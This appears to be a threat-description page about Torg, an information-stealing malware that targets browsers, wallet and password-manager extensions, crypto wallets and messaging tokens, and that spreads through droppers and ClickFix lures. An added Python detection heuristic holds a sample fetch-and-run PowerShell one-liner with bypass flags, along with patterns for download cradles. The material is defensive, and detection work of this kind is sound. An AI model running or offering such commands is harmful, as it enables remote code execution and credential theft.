Torg Stealer
Torg is a highly dangerous information-stealing malware designed to extract sensitive data from infected systems and transmit it to cybercriminals through an API-based infrastructure. It is distributed under a Malware-as-a-Service (MaaS) model, making it accessible to a wide range of threat actors. Once detected on a device, immediate removal is critical to prevent further data compromise.
Extensive Browser Targeting Capabilities
One of Torg’s primary strengths lies in its ability to compromise a wide variety of web browsers. It specifically targets Chromium-based browsers such as Chrome, Edge, Brave, and Opera, as well as Firefox-based browsers. In total, it can extract data from dozens of browsers.
The malware is capable of accessing stored login credentials, including saved passwords and cookies. It is also engineered to bypass or decrypt browser security mechanisms designed to protect this information, making even secured data vulnerable to theft.
Exploiting Browser Extensions and Sensitive Add-ons
Torg significantly expands its reach by targeting browser extensions. It is capable of extracting data from more than 800 extensions, many of which are associated with cryptocurrency wallets, including widely used options like MetaMask and Phantom. Additionally, it targets over 100 security-related extensions, including password managers and two-factor authentication tools.
Beyond financial tools, the malware also harvests information from various note-taking extensions. These extensions often store sensitive user data such as passwords, personal notes, and other confidential information, making them valuable targets for attackers.
Cryptocurrency Wallet Theft on a Large Scale
Torg poses a severe threat to cryptocurrency users by targeting both browser-based and desktop wallet applications. It can extract sensitive wallet data from over 30 desktop wallet programs, including Atomic, AtomicDEX, Bitcoin Core, Daedalus, Electrum, Ethereum, Exodus, Monero, MyEtherWallet, and WalletWasabi.
The malware is capable of stealing highly sensitive information such as wallet seeds, private keys, and session data. This level of access can allow attackers to take full control of cryptocurrency assets.
Targeting Communication, Gaming, and System Data
Torg extends its data theft capabilities to a wide range of applications and services. It can extract Discord tokens by scanning LevelDB databases, enabling unauthorized access to accounts without requiring login credentials. It also captures Telegram session data, potentially granting access to active user sessions, and steals Steam configuration files that may be used to hijack or impersonate gaming accounts.
Additional targets include:
- VPN clients (ExpressVPN, NordVPN, OpenVPN, PIA, ProtonVPN, Surfshark, WireGuard, Windscribe), FTP and remote access tools (FileZilla, mRemoteNG, MobaXterm, Total Commander, WinSCP), and email clients such as Outlook and Thunderbird
- Gaming platforms (Battle.net, GOG Galaxy, Minecraft, Origin/EA, Rockstar Games, Ubisoft Connect), along with sensitive files stored in Desktop and Documents folders
The Impact: Severe Privacy and Financial Risks
Torg operates silently in the background, collecting a wide array of sensitive information without the user’s knowledge. This includes login credentials, financial data, personal files, and account access tokens.
Due to its broad targeting scope, infections can result in serious consequences such as identity theft, account takeovers, financial losses, and long-term privacy breaches. Its ability to compromise multiple platforms simultaneously makes it particularly destructive.
How Torg Infects Systems
The infection process typically begins when users download and execute malicious files disguised as legitimate content. These often include pirated software, cracked applications, fake installers, or game cheats. The initial payload, known as a dropper, secretly installs additional malicious components onto the system.
The attack chain involves several sophisticated stages:
- The dropper deploys hidden malware using obfuscation and encryption techniques to evade detection
- Malicious code may execute directly in memory, avoiding disk-based detection
- A loader prepares the system by hiding processes or injecting code into legitimate Windows processes
- Finally, the Torg stealer is executed in memory, beginning its data exfiltration activities
ClickFix and Other Deceptive Distribution Methods
In addition to traditional infection vectors, Torg is also spread through a technique known as ClickFix. This method manipulates users into copying and executing malicious commands, often disguised as legitimate instructions. These commands are typically PowerShell scripts that, once executed, initiate the infection process and download the malware automatically.
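A defender-side heuristic for the ClickFix pattern described above, added here as an example and not code from the original page: it scores process-creation events (constructed, Sysmon-style fields) for a shell spawned from an interactive parent whose command line both downloads and executes content in one step. The parent-process list, the regexes, the sample events and the threshold are assumptions made for this example.

```python
import re

# Constructed process-creation records with Sysmon Event ID 1 style fields.
# Written for this example; not telemetry from any real infection.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",            # Win+R lure (ClickFix-like)
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/s.txt | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",            # user opened a shell, benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Get-ChildItem C:\Users"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",        # admin script, policy bypass only
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",            # not a shell at all
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe notes.txt"},
]

# Assumed indicators: a pasted one-liner is launched from an interactive parent,
# fetches a payload, and runs it in the same command, often with hidden/bypass flags.
INTERACTIVE_PARENTS = ("explorer.exe", "cmd.exe", "windowsterminal.exe")
SHELLS = ("powershell.exe", "pwsh.exe", "mshta.exe")
DOWNLOAD = re.compile(r"(invoke-webrequest|\biwr\b|\bcurl\b|\birm\b|invoke-restmethod|"
                      r"downloadstring|downloadfile|net\.webclient)", re.I)
EXECUTE = re.compile(r"(invoke-expression|\biex\b|-enc(odedcommand)?\b|start-process)", re.I)
EVASION = re.compile(r"(-w(indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass|"
                     r"-nop\b|-noprofile\b)", re.I)

def score_event(ev):
    """Return (score, reasons) for one process-creation event; 0 for non-shells."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    if image not in SHELLS:
        return 0, []
    score, reasons = 0, []
    if parent in INTERACTIVE_PARENTS:
        score += 1; reasons.append(f"shell spawned by interactive parent {parent}")
    if DOWNLOAD.search(cmd):
        score += 2; reasons.append("download cradle in command line")
    if EXECUTE.search(cmd):
        score += 2; reasons.append("in-line execution of fetched content")
    if EVASION.search(cmd):
        score += 1; reasons.append("hidden window or execution-policy bypass flags")
    return score, reasons

def find_clickfix(events, threshold=4):
    """Indexes, scores and reasons of events at or above the alert threshold."""
    scored = [(i, *score_event(ev)) for i, ev in enumerate(events)]
    return [(i, s, r) for i, s, r in scored if s >= threshold]
```

The benign admin script scores on the bypass flag alone and stays below the threshold, which is the point of requiring the download and execute stages together rather than alerting on any single flag.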
Combined with social engineering tactics and technical obfuscation, these distribution methods make Torg a highly effective and dangerous threat that demands immediate attention and removal if detected.